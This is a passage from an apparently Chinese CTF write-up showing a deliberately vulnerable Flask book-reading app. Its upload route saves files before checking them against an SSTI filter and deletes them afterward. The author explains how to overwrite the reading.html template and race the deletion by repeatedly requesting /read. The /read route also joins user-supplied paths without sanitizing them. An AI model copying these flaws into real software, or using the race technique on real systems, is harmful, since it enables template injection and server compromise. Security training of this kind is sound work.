</span></span><span class="line"><span class="cl"><span class="n">SECRET_KEY</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">getenv</span><span class="p">(</span><span class="s1">&#39;JWT_KEY&#39;</span><span class="p">)</span>  <span class="c1"># 从环境变量中获取 JWT 密钥</span>
</span></span><span class="line"><span class="cl"><span class="n">book_dir</span> <span class="o">=</span> <span class="s1">&#39;books&#39;</span>  <span class="c1"># 设置书籍存储目录</span>
</span></span><span class="line"><span class="cl"><span class="n">users</span> <span class="o">=</span> <span class="p">{</span><span class="s1">&#39;fly233&#39;</span><span class="p">:</span> <span class="s1">&#39;123456789&#39;</span><span class="p">}</span>  <span class="c1"># 用户数据字典（测试用）</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 生成 JWT 令牌函数</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">generate_token</span><span class="p">(</span><span class="n">username</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># 构建载荷，包含用户名</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="s1">&#39;username&#39;</span><span class="p">:</span> <span class="n">username</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># 使用 HMAC-SHA256 算法和密钥对载荷进行编码，生成令牌</span>
</span></span><span class="line"><span class="cl">    <span class="n">token</span> <span class="o">=</span> <span class="n">jwt</span><span class="o">.</span><span class="n">encode</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">SECRET_KEY</span><span class="p">,</span> <span class="n">algorithm</span><span class="o">=</span><span class="s1">&#39;HS256&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">token</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 解码 JWT 令牌函数</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">decode_token</span><span class="p">(</span><span class="n">token</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 尝试使用密钥和 HMAC-SHA256 算法解码令牌</span>
</span></span><span class="line"><span class="cl">        <span class="n">payload</span> <span class="o">=</span> <span class="n">jwt</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="n">token</span><span class="p">,</span> <span class="n">SECRET_KEY</span><span class="p">,</span> <span class="n">algorithms</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;HS256&#39;</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">payload</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="n">jwt</span><span class="o">.</span><span class="n">ExpiredSignatureError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 如果令牌过期，返回 None</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="kc">None</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="n">jwt</span><span class="o">.</span><span class="n">InvalidTokenError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 如果令牌无效，返回 None</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="kc">None</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 主页路由</span>
</span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">index</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">cookies</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;token&#39;</span><span class="p">)</span>  <span class="c1"># 从请求的 cookie 中获取令牌</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span>  <span class="c1"># 如果没有令牌，重定向到登录页面</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">=</span> <span class="n">decode_token</span><span class="p">(</span><span class="n">token</span><span class="p">)</span>  <span class="c1"># 对令牌进行解码</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="ow">not</span> <span class="n">payload</span><span class="p">:</span>  <span class="c1"># 如果解码失败，重定向到登录页面</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">username</span> <span class="o">=</span> <span class="n">payload</span><span class="p">[</span><span class="s1">&#39;username&#39;</span><span class="p">]</span>  <span class="c1"># 从载荷中获取用户名</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># 获取书籍目录下所有以 .txt 结尾的文件名</span>
</span></span><span class="line"><span class="cl">    <span class="n">books</span> <span class="o">=</span> <span class="p">[</span><span class="n">f</span> <span class="k">for</span> <span class="n">f</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">listdir</span><span class="p">(</span><span class="n">book_dir</span><span class="p">)</span> <span class="k">if</span> <span class="n">f</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">&#39;.txt&#39;</span><span class="p">)]</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># 渲染主页模板，传入用户名和书籍列表</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;./index.html&#39;</span><span class="p">,</span> <span class="n">username</span><span class="o">=</span><span class="n">username</span><span class="p">,</span> <span class="n">books</span><span class="o">=</span><span class="n">books</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 登录路由</span>
</span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;GET&#39;</span><span class="p">,</span> <span class="s1">&#39;POST&#39;</span><span class="p">])</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">login</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">&#39;GET&#39;</span><span class="p">:</span>  <span class="c1"># 如果是 GET 请求</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 渲染登录页面模板</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;./login.html&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">elif</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">&#39;POST&#39;</span><span class="p">:</span>  <span class="c1"># 如果是 POST 请求</span>
</span></span><span class="line"><span class="cl">        <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;username&#39;</span><span class="p">)</span>  <span class="c1"># 从表单获取用户名</span>
</span></span><span class="line"><span class="cl">        <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;password&#39;</span><span class="p">)</span>  <span class="c1"># 从表单获取密码</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 验证用户名和密码是否匹配</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="n">username</span> <span class="ow">in</span> <span class="n">users</span> <span class="ow">and</span> <span class="n">users</span><span class="p">[</span><span class="n">username</span><span class="p">]</span> <span class="o">==</span> <span class="n">password</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">token</span> <span class="o">=</span> <span class="n">generate_token</span><span class="p">(</span><span class="n">username</span><span class="p">)</span>  <span class="c1"># 生成令牌</span>
</span></span><span class="line"><span class="cl">            <span class="c1"># 创建响应对象，返回成功消息</span>
</span></span><span class="line"><span class="cl">            <span class="n">response</span> <span class="o">=</span> <span class="n">make_response</span><span class="p">(</span><span class="n">jsonify</span><span class="p">({</span>
</span></span><span class="line"><span class="cl">                <span class="s1">&#39;message&#39;</span><span class="p">:</span> <span class="s1">&#39;success&#39;</span>
</span></span><span class="line"><span class="cl">            <span class="p">}),</span> <span class="mi">200</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="c1"># 将令牌设置为 cookie，仅 HTTP 可访问，路径为根目录</span>
</span></span><span class="line"><span class="cl">            <span class="n">response</span><span class="o">.</span><span class="n">set_cookie</span><span class="p">(</span><span class="s1">&#39;token&#39;</span><span class="p">,</span> <span class="n">token</span><span class="p">,</span> <span class="n">httponly</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">path</span><span class="o">=</span><span class="s1">&#39;/&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="n">response</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="c1"># 返回错误消息，用户名或密码错误</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="p">{</span><span class="s1">&#39;message&#39;</span><span class="p">:</span> <span class="s1">&#39;Invalid username or password&#39;</span><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 读取书籍路由</span>
</span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/read&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">read_book</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">cookies</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;token&#39;</span><span class="p">)</span>  <span class="c1"># 从请求的 cookie 中获取令牌</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span>  <span class="c1"># 如果没有令牌，重定向到登录页面</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">=</span> <span class="n">decode_token</span><span class="p">(</span><span class="n">token</span><span class="p">)</span>  <span class="c1"># 对令牌进行解码</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="ow">not</span> <span class="n">payload</span><span class="p">:</span>  <span class="c1"># 如果解码失败，重定向到登录页面</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">book_path</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;book_path&#39;</span><span class="p">)</span>  <span class="c1"># 从表单获取书籍路径</span>
</span></span><span class="line"><span class="cl">    <span class="n">full_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">book_dir</span><span class="p">,</span> <span class="n">book_path</span><span class="p">)</span>  <span class="c1"># 构造完整路径</span>
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 打开并读取书籍文件内容</span>
</span></span><span class="line"><span class="cl">        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">full_path</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s1">&#39;utf-8&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">file</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">content</span> <span class="o">=</span> <span class="n">file</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 渲染阅读页面模板，传入书籍内容</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;reading.html&#39;</span><span class="p">,</span> <span class="n">content</span><span class="o">=</span><span class="n">content</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">FileNotFoundError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 如果文件不存在，返回 404 错误</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="s2">&#34;文件未找到&#34;</span><span class="p">,</span> <span class="mi">404</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 捕获其他异常，返回 500 错误</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="sa">f</span><span class="s2">&#34;发生错误: </span><span class="si">{</span><span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">)</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">,</span> <span class="mi">500</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="c1"># 上传书籍路由</span>
</span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/upload&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;GET&#39;</span><span class="p">,</span> <span class="s1">&#39;POST&#39;</span><span class="p">])</span>
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">upload</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="n">token</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">cookies</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;token&#39;</span><span class="p">)</span>  <span class="c1"># 从请求的 cookie 中获取令牌</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="ow">not</span> <span class="n">token</span><span class="p">:</span>  <span class="c1"># 如果没有令牌，重定向到登录页面</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">=</span> <span class="n">decode_token</span><span class="p">(</span><span class="n">token</span><span class="p">)</span>  <span class="c1"># 对令牌进行解码</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="ow">not</span> <span class="n">payload</span><span class="p">:</span>  <span class="c1"># 如果解码失败，重定向到登录页面</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;/login&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">request</span><span class="o">.</span><span class="n">method</span> <span class="o">==</span> <span class="s1">&#39;GET&#39;</span><span class="p">:</span>  <span class="c1"># 如果是 GET 请求</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 渲染上传页面模板</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;./upload.html&#39;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># 检查当前用户是否为管理员</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">payload</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;username&#39;</span><span class="p">)</span> <span class="o">!=</span> <span class="s1">&#39;admin&#39;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 如果不是管理员，返回脚本提示权限不足，并重定向到主页</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">        &lt;script&gt;
</span></span></span><span class="line"><span class="cl"><span class="s2">            alert(&#39;只有管理员才有添加图书的权限&#39;);
</span></span></span><span class="line"><span class="cl"><span class="s2">            window.location.href = &#39;/&#39;;
</span></span></span><span class="line"><span class="cl"><span class="s2">        &lt;/script&gt;
</span></span></span><span class="line"><span class="cl"><span class="s2">        &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">file</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">files</span><span class="p">[</span><span class="s1">&#39;file&#39;</span><span class="p">]</span>  <span class="c1"># 从请求中获取上传的文件</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="n">file</span><span class="p">:</span>  <span class="c1"># 如果文件存在</span>
</span></span><span class="line"><span class="cl">        <span class="n">book_path</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;book_path&#39;</span><span class="p">)</span>  <span class="c1"># 获取书籍路径</span>
</span></span><span class="line"><span class="cl">        <span class="n">file_path</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">book_path</span><span class="p">,</span> <span class="n">file</span><span class="o">.</span><span class="n">filename</span><span class="p">)</span>  <span class="c1"># 构造文件保存路径</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">book_path</span><span class="p">):</span>  <span class="c1"># 如果指定路径不存</span>
</span></span><span class="line"><span class="cl">            <span class="c1"># 返回 400 错误，文件夹不存在</span>
</span></span><span class="line"><span class="cl">            <span class="k">return</span> <span class="s2">&#34;文件夹不存在&#34;</span><span class="p">,</span> <span class="mi">400</span>
</span></span><span class="line"><span class="cl">        <span class="n">file</span><span class="o">.</span><span class="n">save</span><span class="p">(</span><span class="n">file_path</span><span class="p">)</span>  <span class="c1"># 保存文件</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="c1"># 打开并读取文件内容</span>
</span></span><span class="line"><span class="cl">        <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">file_path</span><span class="p">,</span> <span class="s1">&#39;r&#39;</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s1">&#39;utf-8&#39;</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">            <span class="n">content</span> <span class="o">=</span> <span class="n">f</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">            <span class="c1"># 定义敏感字符模式</span>
</span></span><span class="line"><span class="cl">            <span class="n">pattern</span> <span class="o">=</span> <span class="sa">r</span><span class="s1">&#39;[</span><span class="si">{}</span><span class="s1">&lt;&gt;_%]&#39;</span>
</span></span><span class="line"><span class="cl">            <span class="c1"># 检查内容中是否包含敏感字符</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="n">re</span><span class="o">.</span><span class="n">search</span><span class="p">(</span><span class="n">pattern</span><span class="p">,</span> <span class="n">content</span><span class="p">):</span>
</span></span><span class="line"><span class="cl">                <span class="n">os</span><span class="o">.</span><span class="n">remove</span><span class="p">(</span><span class="n">file_path</span><span class="p">)</span>  <span class="c1"># 删除文件</span>
</span></span><span class="line"><span class="cl">                <span class="c1"># 返回脚本提示检测到 SSTI 攻击，并重定向到主页</span>
</span></span><span class="line"><span class="cl">                <span class="k">return</span> <span class="s2">&#34;&#34;&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">                &lt;script&gt;
</span></span></span><span class="line"><span class="cl"><span class="s2">                    alert(&#39;SSTI,想的美！&#39;);
</span></span></span><span class="line"><span class="cl"><span class="s2">                    window.location.href = &#39;/&#39;;
</span></span></span><span class="line"><span class="cl"><span class="s2">                &lt;/script&gt;
</span></span></span><span class="line"><span class="cl"><span class="s2">                &#34;&#34;&#34;</span>
</span></span><span class="line"><span class="cl">        <span class="c1"># 重定向到主页</span>
</span></span><span class="line"><span class="cl">        <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;index&#39;</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">    <span class="c1"># 如果没有选择文件，返回 400 错误</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="s2">&#34;未选择文件&#34;</span><span class="p">,</span> <span class="mi">400</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>​	sstiban了{}那显然是没有注入的可能了。</p>
<p>​	<strong>观察到upload路由里在检测waf的时候到有个os.remove，用于删除文件，这里就可以打条件竞争了，我们上传reading.html文件，对/app/templates/reading.html进行覆盖，然后利用条件竞争在html被删掉之前去读取/read的返回值</strong></p>
<p>​	这里我们需要爆破两个，一个是/read，一个是上传文件的</p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214825223.png"
	width="1540"
	height="670"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214825223_hu17802140975017647871.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214825223_hu16342916308744802832.png 1024w"
	loading="lazy"
	
		alt="image-20250528214825223"
	
	
		class="gallery-image" 
		data-flex-grow="229"
		data-flex-basis="551px"
	
></p>
<p><img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214856565.png"
	width="1555"
	height="619"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214856565_hu10452425151347688161.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214856565_hu18132257124737537267.png 1024w"
	loading="lazy"
	
		alt="image-20250528214856565"
	
	
		class="gallery-image" 
		data-flex-grow="251"
		data-flex-basis="602px"
	
></p>
<p>​	<img src="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214018440.png"
	width="1511"
	height="832"
	srcset="/p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214018440_hu9628159224294594336.png 480w, /p/%E8%BD%A9%E8%BE%95%E6%9D%AFwp%E5%A4%8D%E7%9B%98/image-20250528214018440_hu6082378350100958410.png 1024w"
	loading="lazy"
	
		alt="image-20250528214018440"
	
	
		class="gallery-image" 
		data-flex-grow="181"
		data-flex-basis="435px"
	
></p>

</section>


    <footer class="article-footer">
    

    </footer>


    
</article>

    

    

<aside class="related-content--wrapper">
    <h2 class="section-title">相关文章</h2>
    <div class="related-content">
        <div class="flex article-list--tile">
            
                
<article class="">
    <a href="/p/litctf%E5%A4%8D%E7%8E%B0/">
        
        

        <div class="article-details">
            <h2 class="article-title">Litctf复现</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982025/">
        
        

        <div class="article-details">
            <h2 class="article-title">极客大挑战2025</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/cyberstrikelab%E6%B8%97%E9%80%8F%E5%A4%8D%E7%8E%B0/">
        
        

        <div class="article-details">
            <h2 class="article-title">cyberstrikelab渗透复现</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%E6%B8%97%E9%80%8F%E5%A4%8D%E7%8E%B0/">
        
        

        <div class="article-details">
            <h2 class="article-title">春秋云镜渗透复现</h2>
        </div>
    </a>
</article>

            
                
<article class="">
    <a href="/p/2025%E6%B1%9F%E8%A5%BF%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E7%9C%81%E8%B5%9B%E5%86%B3%E8%B5%9B/">
        
        

        <div class="article-details">
            <h2 class="article-title">2025江西信息技术省赛决赛</h2>
        </div>
    </a>
</article>

            
        </div>
    </div>
</aside>

     
    
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script>
    window.disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (typeof DISQUS == 'object') {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2025 - 
        
        2026 liernian
    </section>
    
    <section class="powerby">
        使用 <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> 构建 <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.30.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.59729e8016d63fb571847b33800c7f0e48c9acdb8eaed3eec3e94d3bcad55aca.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
